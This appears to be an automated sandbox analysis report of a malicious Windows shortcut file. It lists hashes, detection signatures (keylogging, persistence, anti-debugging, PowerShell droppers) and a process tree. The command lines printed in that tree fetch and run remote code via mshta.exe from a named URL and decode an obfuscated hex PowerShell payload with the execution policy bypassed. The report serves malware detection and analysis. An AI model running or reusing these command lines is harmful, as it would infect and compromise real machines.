Edit tour
Windows
Analysis Report
s4PymYGgSh.lnk
Overview
General Information
Sample name: | s4PymYGgSh.lnkrenamed because original name is a hash value |
Original sample name: | f2d11d2f41fe0c5b667ddc0cdde9b149.lnk |
Analysis ID: | 1577872 |
MD5: | f2d11d2f41fe0c5b667ddc0cdde9b149 |
SHA1: | 56401fcd09bc96c694ed3c7dd5ad94733cd747ae |
SHA256: | 8c5195f5d2c6f618d5f98a9f32809b5da490cb1c48512d410c1896695fb4d394 |
Tags: | lnkuser-abuse_ch |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 7684 cmdline:
"C:\Window s\System32 \forfiles. exe" /p C: \Windows\S ystem32 /m cmmon32.e xe /c "pow ershell . \*i*\*2\ms h*e https: //tiffany- careers.co m/duydemo MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E) - conhost.exe (PID: 7692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7748 cmdline:
. \*i*\*2\ msh*e http s://tiffan y-careers. com/duydem o MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 7892 cmdline:
"C:\Window s\System32 \mshta.exe " https:// tiffany-ca reers.com/ duydemo MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 8128 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction clea n ($VGARXd ){return - split ($VG ARXd -repl ace '..', '0x$& ')}; $DLBqcOk = clean('00 952E0EAAA3 69CB7EDA09 4FDAAD548D C7EBBE105E 37D3A4DD5A 7D2DC3C7BD B28C069492 89913AE18A FF4985AC0A 4A425F444A 5427F4855F 02DC192D92 C9D059910F 5326B551C1 FBE3BD556C 61D517FD26 BB0DDA1135 50D575D28F 8A61036933 37BF9498AB 6F862E4DA5 E000AA791D 9AA38BFFDF 638AEFEB44 FA353B1BBC 79C0B8F3F0 39BBFB473D BE5A2163C5 297FEA3B44 9744B787BF D5E3D2D2DC 793FA3D425 73446DB8C1 522E13A769 6F37E5C6DF B4339D6F31 2DA4F7AC3F 7F8A272A1C 7E6D46C705 DC9106ADB9 D2690AD45F 178F68F3F9 6535F494B1 C112A90293 671FCF3A99 B408B224F3 6FEDB31BC4 BE9660AB33 38DC0571CC 95E4819A64 1F1E63F34E EA383DA815 07A9460D2F 793F27C40F 0BE3CDC495 923F94F572 D7CC36F0F9 BC192B64FF F1EA68FF6D F1267E8570 3F7CE3A1B2 B369CB69B3 82FA5E5414 694A7FAC82 DB7EF1CD63 E7D0DB2867 88C22BE423 741CE14EED 86328E5B0A 1B5E6015C0 81B9ADC558 4B188904C7 2FB7809947 462ABB46B4 411C8F7467 776C4CF5E6 DE4A125B51 E141F5F377 DC69A3A551 F363C5B92C 853BD07B17 D6A6D22B1B B2125B1DAA 5AEB4779F8 20FD87D3A4 73D74F813C 3D317EDD4C A7364858BE 4EF1A199CF 0CCE68623C FCC2DAE619 884748B066 9842ADD109 C7C2D3C94C 5E60D37345 08294BF013 972C272FD9 70EC7823EE F4EC60519B 53B7CB23D4 B5AB2A35FF DA992A39E9 5A2EA920D0 A343160707 DD5A2D29AE 6EF568D25D 354BAD060E EB2312EFC7 0E38222803 8F6E3AAFBE 6DA3F033EC 03FCFAC2E6 474AA92901 C29C7E935F 0EF9256603 E50E9AE54F 28C64EB0B6 2541C16C81 B31F123EB1 F62AA07503 0DF335F2F2 33B1D0572D B1344253CB 16FC57D50E A0FEC5F117 610698B398 1E1FE10375 93D2F25954 CEB7AA7476 166501E6E9 1201EA06DC EA504BF175 5984B1EB67 2A8368994F 7FC4C67586 ED78251A2F 06F39283D3 DE14A0B398 BD25B7578A D0901A3630 3C6EEAE780 BD3A96D106 C54D28D917 4422CFC0C1 2EED237BB3 D9D8B8C0BE F9DE95A209 C8CC66E2B5 38F79DDAF3 183835A0F7 F6694A4077 6335E75BDE CD48A839EC 0682B59CFA 1D33BB11A3 49DDBB588B 3F645CB31E 55E0AB2543 363E815610 EB013DEB7C E8EC26A913 B7BEF508C1 825E8C10EB 3320C2D1CE 31D968F2E4 7C293CD02C 39B4995231 27D609CCD0 6DC157D6D2 B498A34CF1 4B0E20BF6B C402B4A171 A623AF2425 3354BF256B 06B278DBBE 05F05B405C AA69A5B27D 9635119927 475C932D7E 26F612B9A6 119E0DA2D9 5273F043B8 BF88A54B8C 708E55E082 64CBA9B31B E5DF8578C4 F53770C16C 752FFC20FF 1177103B4E 88CB671AD1 E8922D66CE D32F4A427E A0E9009B24 EE692A0DF6 E540DDA021 4C6CED1151 13D1DE60DB 67E356E2FA 9994FEE2C1 D1BB4C9EFC C878383644 915EAE6C54 AB94C50C12 CF86B0105A 8EF91D6ABC 4C61CDFB58 006AC5F6D6 B39AB88817 B83AB53CE4 965B39228A F37E6A49E5 392F23C955 3BCF407526 0DF9B4FE20 DB589FB4EA 5567B6AE3A 73FA2FA7C9 6B3C25C044 D663A965CC 679968E223 49FD362344 D3981B8482 F16667D582 9063A00F89 4C03FC9CC5 753DD640CC 66AB7B73D9